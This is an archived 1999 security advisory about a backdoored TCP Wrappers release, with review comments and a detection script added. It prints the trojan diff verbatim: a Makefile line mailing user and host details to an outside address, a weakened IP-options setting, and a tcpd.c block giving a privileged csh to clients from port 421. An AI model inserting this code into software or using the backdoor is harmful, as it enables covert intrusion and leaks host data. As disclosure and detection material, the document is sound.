tcpwrapper-backdoor.txt
Posted Aug 17, 1999

Backdoored TCP Wrapper source code discovered. Although only 52 people downloaded this code from ftp.win.tue.nl (all have been notified), this notice serves as an excellent reminder that you should ALWAYS verify the PGP and file signatures of ANY software that you download. The backdoor exploit code is included in this file.

tags | exploit, tcp
MD5 | c1f87f7e57405e2a8940cf49b505b54e

Date: Thu, 21 Jan 1999 11:38:17 -0500
From: Wietse Venema <wietse@PORCUPINE.ORG>
To: BUGTRAQ@netspace.org
Subject: backdoored tcp wrapper source code

TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. It has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
a backdoored version. Eventually this was bound to happen, and
that's why the source file is accompanied by a PGP signature. But
that is no guarantee against people downloading and installing
backdoored software.

The backdoor gives access to a privileged shell when a client
connects from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and
16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

% ls -lcta
-r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
...
dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 .

Restored version:

% ls -lt tcp_wrappers_7.6.tar.gz
-r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.
The signature of a compiled tcpd binary is:

strings -a tcpd | grep csh

any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile Mon Apr 7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
@echo
@echo "If none of these match your environment, edit the system"
@echo "dependencies sections in the Makefile and do a 'make other'."
+ @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'
@echo

#######################################################
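Review bot: the added recipe line @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com' mails the building user's name and the full uname -a output to an outside hotmail address every time this help target runs; a target that only echoes configuration hints has no reason to send mail anywhere, so this is a silent beacon reporting which hosts built the package. Remove the line, and treat any host that ran make from this tree as having already reported itself to that address.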
***************
*** 649,655 ****
# source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
# Solaris 2.x, and Linux. See your system documentation for details.
#
! KILL_OPT= -DKILL_IP_OPTIONS

## End configuration options
############################
--- 650,656 ----
# source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
# Solaris 2.x, and Linux. See your system documentation for details.
#
! # KILL_OPT= -DKILL_IP_OPTIONS

## End configuration options
############################
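Review bot: the sole change in this hunk comments out KILL_OPT= -DKILL_IP_OPTIONS, so tcpd is no longer compiled with the IP-options handling that the preceding comment ties to source-routed traffic; turning that protection off for every platform, with no explanation and with the explanatory comment left untouched, weakens the wrapper exactly where the comment says it matters. Restore the line as shipped.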
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
int allow_severity = SEVERITY; /* run-time adjustable */
int deny_severity = LOG_WARNING; /* ditto */

+ char IDENT[]="NC421\n";
+ char SRUN[]="-csh";
+ char SPATH[]="/bin/csh";
+ #define PORT 421
+
main(argc, argv)
int argc;
char **argv;
{
struct request_info request;
+ struct sockaddr_in from;
char path[MAXPATHNAMELEN];
+ int fromlen;
+
+ fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+ &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+ strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

/* Attempt to prevent the creation of world-writable files. */
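Review bot: the block inserted at the top of main(), ahead of all of tcpd's own request handling, calls getpeername() on descriptor 0 (the connection inetd hands to tcpd) and, when the client's source port equals PORT (421), writes the IDENT banner "NC421" back to the socket and execl()s /bin/csh with argv[0] "-csh" in place of tcpd; because tcpd inherits inetd's privileges and this runs before any hosts.allow/hosts.deny evaluation, it is the privileged-shell backdoor the post describes. The string constants SRUN and SPATH are also why the post's strings -a tcpd | grep csh check flags a built binary. Reject the hunk outright; there is no legitimate reason for tcpd to exec a shell.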
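A defender-side check for the indicators the post gives (tarball length, the three source changes, and a csh string in a built tcpd), added here as an example and not part of Wietse's post or the tcp_wrappers sources; it assumes an unpacked tree containing Makefile and tcpd.c, and uses tr in place of strings so the binary check also runs where binutils is absent.

```shell
#!/bin/sh
# Added example, not from Wietse's post or the tcp_wrappers sources: checks a
# downloaded tcp_wrappers_7.6.tar.gz, an unpacked tree and a built tcpd against
# the indicators listed in the post. Each check prints what it found and
# returns 1, or returns 0 when that indicator is absent.

GENUINE_TAR_SIZE=99438     # length of the restored tarball (from the post)
BACKDOORED_TAR_SIZE=99186  # length of the trojaned tarball (from the post)

# $1 = tarball path: flags the known bad length, and any length but the genuine one
check_tarball_size() {
  size=$(wc -c < "$1" | tr -d ' ')
  if [ "$size" -eq "$BACKDOORED_TAR_SIZE" ]; then
    echo "$1: length $size is the backdoored tarball"; return 1
  elif [ "$size" -ne "$GENUINE_TAR_SIZE" ]; then
    echo "$1: length $size, genuine 7.6 tarball is $GENUINE_TAR_SIZE"; return 1
  fi
}

# $1 = directory holding Makefile and tcpd.c: looks for the three diffed changes
check_source_tree() {
  rc=0
  if grep -q 'mail -s debug' "$1/Makefile"; then
    echo "$1/Makefile: build-time mail beacon (sends whoami/uname off-host)"; rc=1
  fi
  if grep -q '^# *KILL_OPT= *-DKILL_IP_OPTIONS' "$1/Makefile"; then
    echo "$1/Makefile: KILL_OPT commented out"; rc=1
  fi
  if grep -Eq 'NC421|/bin/csh|getpeername\(0' "$1/tcpd.c"; then
    echo "$1/tcpd.c: port-421 shell backdoor strings present"; rc=1
  fi
  return $rc
}

# $1 = built tcpd: the post's "strings -a tcpd | grep csh", with tr standing in
# for strings so it also runs where binutils is not installed
check_binary() {
  if tr -c '[:print:]' '\n' < "$1" | grep -q csh; then
    echo "$1: contains a 'csh' string; the post says any such output means trouble"
    return 1
  fi
}

# usage: sh check_tcpw.sh /path/to/unpacked/tcp_wrappers_7.6 [built-tcpd]
if [ $# -ge 1 ]; then
  check_source_tree "$1" || status=1
  [ $# -lt 2 ] || check_binary "$2" || status=1
  exit "${status:-0}"
fi
```

The length checks only catch this particular replacement; the PGP signature on the tarball remains the test that matters.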
